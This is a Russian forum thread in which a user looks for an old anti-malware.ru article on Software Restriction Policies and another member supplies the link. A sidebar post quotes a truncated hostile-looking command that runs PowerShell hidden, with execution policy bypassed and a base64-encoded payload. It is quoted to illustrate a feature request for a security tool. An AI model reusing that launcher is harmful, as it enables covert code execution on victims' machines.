Перейти к содержанию
Илио́н

Ищу статью на АМ.

Recommended Posts

Илио́н

Помогите найти статью на сайте АМ Дмитрия Михеева, в которой рассказывалось о принципах и возможностях защиты ПК от угроз с помощью встроенных функций. (Если не ошибаюсь, то возможно речь шла о применении групповых политик, или что-то в этом роде). Статья была доступна на главной странице примерно год назад. :unsure:

Поиск не помог. А по автору поиска нет. Спасибо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Илио́н

Сергей Ильин

К сожалению нет. Я конечно просматривал примерно за год-полтора все статьи на АМ.

Я скорее всего ошибся. Статья была выпущена более года назад. Скорее два. :unsure:

В ней были примеры организации, если не ошибаюсь, но по-моему не ошибаюсь, как с помощью административных шаблонов организовать проблему для внедрения вирусных угроз в ОС (запрет запуска програм и в таком плане). Она не касалась DLP. А описовала частное применение. Дело в том, что я и ранее пытался искать эту статью (блог), и также не мог. Но поверьте мне, она существовала. Буду ещё искать. Она интересна пратическими применениями (это было описано в статье). Хотелось показать сотрудникам. Спасибо за помощь. Если обратится к Дмитрию, он наверняка помнит. (Если это конечно вообще возможно).

Спасибо вам за помощь. Если найду сам - сообщу. Сейчас, конечно, мало уже кто помнит.

Доп. В заглавии было вынесено, что без применения дополнительных антивирусных решений. Как-то так. :blink:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Я думаю, что вы ищете вот эту статью ;)

http://www.anti-malware.ru/reviews/Softwar...iction_Policies

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Илио́н

Сергей Ильин

Спасибо большое. Это то что я искал.

Приношу извинения, за частичное искажение информации.

Искал и по названию - но не попадалась почему-то. :rolleyes:

Прсто статья с "бородой". Вот и возможные ассоциации. Надеюсь ни кого не обидел. :)

Стать интересная. Возможно будут вопросики.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Можно обсудить SPR в этой теме http://www.anti-malware.ru/forum/index.php?showtopic=22616

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Илио́н

Сергей Ильин

Ещё раз спасибо. В моём антивирусе как раз слабый контроль программ (можно сказать отсутствует). Думается будет не плохой заменой. Почему задался вопросом? Может, конечно, опять ошибаюсь, но в инете не так много тем, посвященных данному вопросу.

P.S. Сначала всё разломаем, а уж потом бум смотреть как чинить... :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×